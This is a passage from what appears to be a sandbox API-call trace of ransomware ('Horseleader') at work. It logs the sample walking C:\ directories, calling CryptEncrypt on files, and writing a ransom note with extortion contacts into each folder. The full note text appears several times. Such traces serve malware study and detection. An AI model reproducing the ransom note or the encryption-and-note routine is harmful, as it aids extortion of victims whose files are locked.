ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.059] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.059] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\#Decrypt#.txt") returned 31 [0125.059] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-tw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.061] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0125.061] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.063] lstrlenA (lpString="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") returned 1368 [0125.063] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.063] CloseHandle (hObject=0x1dc) returned 1 [0125.063] GetProcessHeap () returned 0x780000 [0125.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.064] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0125.064] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0125.064] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\#Decrypt#.txt") returned 25 [0125.064] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\#Decrypt#.txt" (normalized: "c:\\boot\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0125.065] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client 
installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0125.065] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0125.067] lstrlenA (lpString="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") returned 1368 [0125.067] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0125.067] CloseHandle (hObject=0x158) returned 1 [0125.068] GetProcessHeap () returned 0x780000 [0125.068] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.068] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0125.068] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0125.068] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0125.068] StrStrIW (lpFirst="bootmgr", lpSrch=".horseleader") returned 0x0 [0125.069] lstrcmpW (lpString1="bootmgr", lpString2="#Decrypt#.txt") returned 1 [0125.069] lstrcmpW (lpString1="bootmgr", lpString2="_uninstalling_.png") returned 1 [0125.069] lstrlenW (lpString=".testttjffg") returned 11 [0125.069] StrStrW (lpFirst="\\\\?\\C:\\bootmgr", lpSrch=".testttjffg") returned 0x0 [0125.069] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: 
pbBuffer=0x32af6f0) returned 1 [0125.069] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.070] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.070] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0125.070] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0125.070] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0125.071] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".horseleader") returned 0x0 [0125.071] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="#Decrypt#.txt") returned 1 [0125.071] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="_uninstalling_.png") returned 1 [0125.071] lstrlenW (lpString=".testttjffg") returned 11 [0125.071] StrStrW (lpFirst="\\\\?\\C:\\BOOTSECT.BAK", lpSrch=".testttjffg") returned 0x0 [0125.071] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0125.071] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.072] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" 
(normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.097] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0125.100] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows") returned -1 [0125.103] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0125.103] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0125.104] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0125.104] lstrcmpW (lpString1="\\\\?\\C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.104] GetProcessHeap () returned 0x780000 [0125.105] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0125.107] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0125.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0125.309] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.309] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0125.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.309] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0125.309] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0125.309] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0125.309] lstrlenW (lpString=".testttjffg") returned 11 [0125.310] StrStrW (lpFirst="\\\\?\\C:\\Config.Msi\\.", lpSrch=".testttjffg") returned 0x0 [0125.310] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.310] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.310] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\." 
(normalized: "c:\\config.msi\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.310] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0125.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.312] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0125.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.313] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0125.314] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0125.314] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0125.314] lstrlenW (lpString=".testttjffg") returned 11 [0125.316] StrStrW (lpFirst="\\\\?\\C:\\Config.Msi\\..", lpSrch=".testttjffg") returned 0x0 [0125.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.325] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.326] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.327] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 0 [0125.329] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0125.329] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\#Decrypt#.txt") returned 31 [0125.330] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\#Decrypt#.txt" (normalized: "c:\\config.msi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0125.330] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0125.336] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0125.347] lstrlenA (lpString="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") returned 1368 [0125.355] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0125.355] CloseHandle (hObject=0x200) returned 1 [0125.356] GetProcessHeap () returned 0x780000 [0125.356] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.356] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0125.357] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0125.357] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0125.359] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0125.367] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0125.368] lstrcmpW (lpString1="\\\\?\\C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.369] GetProcessHeap () returned 0x780000 [0125.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7b67f0 [0125.397] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0125.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0125.407] GetProcessHeap () returned 0x780000 [0125.407] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.407] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0125.407] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0125.407] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0125.407] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".horseleader") returned 0x0 [0125.407] lstrcmpW (lpString1="hiberfil.sys", lpString2="#Decrypt#.txt") returned 1 [0125.408] lstrcmpW (lpString1="hiberfil.sys", lpString2="_uninstalling_.png") returned 1 [0125.408] lstrlenW (lpString=".testttjffg") returned 11 [0125.408] StrStrW (lpFirst="\\\\?\\C:\\hiberfil.sys", 
lpSrch=".testttjffg") returned 0x0 [0125.408] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0125.408] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.408] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.411] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0125.411] lstrcmpiW (lpString1="MSOCache", lpString2="Windows") returned -1 [0125.432] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0125.432] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0125.435] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0125.438] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.444] GetProcessHeap () returned 0x780000 [0125.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0125.445] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0125.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x32af580 | out: 
lpFindFileData=0x32af580*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0125.557] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.558] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0125.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.559] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0125.560] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0125.560] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0125.562] lstrlenW (lpString=".testttjffg") returned 11 [0125.576] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\.", lpSrch=".testttjffg") returned 0x0 [0125.576] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.576] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.576] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\." 
(normalized: "c:\\msocache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.577] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0125.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.577] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0125.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.577] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0125.577] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0125.577] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0125.577] lstrlenW (lpString=".testttjffg") returned 11 [0125.577] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\..", lpSrch=".testttjffg") returned 0x0 [0125.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.578] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\.." 
